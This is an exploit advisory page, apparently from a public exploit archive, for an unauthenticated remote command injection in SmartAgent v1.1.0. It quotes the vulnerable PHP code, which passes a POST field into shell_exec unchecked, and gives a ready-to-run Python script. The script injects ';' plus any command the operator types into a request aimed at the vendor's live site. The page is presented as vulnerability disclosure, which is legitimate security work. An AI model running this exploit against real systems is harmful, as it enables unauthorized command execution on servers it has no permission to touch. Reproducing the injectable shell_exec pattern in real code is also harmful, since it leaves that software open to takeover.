SmartAgent 1.1.0 Remote Code Execution

2024.11.02

Credit: Alter Prime

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: SmartAgent v1.1.0 - Unauthenticated Remote Code Execution
# Date: 01-10-2024
# Exploit Author: Alter Prime
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com
# Version: Build v1.1.0
# Tested on: Kali Linux

An unauthenticated user can access a php script called https://smarts-srlcom.com/youtubeInfo.php from the vulnerable web application and through a POST request with vulnerable parameter "youtubeUrl" a command injection vulnerability could be triggered.

Vulnerable code snippet from youtubeInfo.php:
"""
$youtubeUrl=$_POST["youtubeUrl"];
$command = 'youtube-dl -j ' . $youtubeUrl;
echo  shell_exec($command);
"""


Steps To Reproduce:
1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0


#Python Exploit

import requests

url = "https://smarts-srlcom.com?youtubeInfo.php"
command = input("Enter the command you want to run \(EX: id\): ")

postdata = {
    "youtubeUrl": ";" + command
}

response = requests.post(url, data=postdata, verify=False)
print(response.text)

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SmartAgent 1.1.0 Remote Code Execution

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.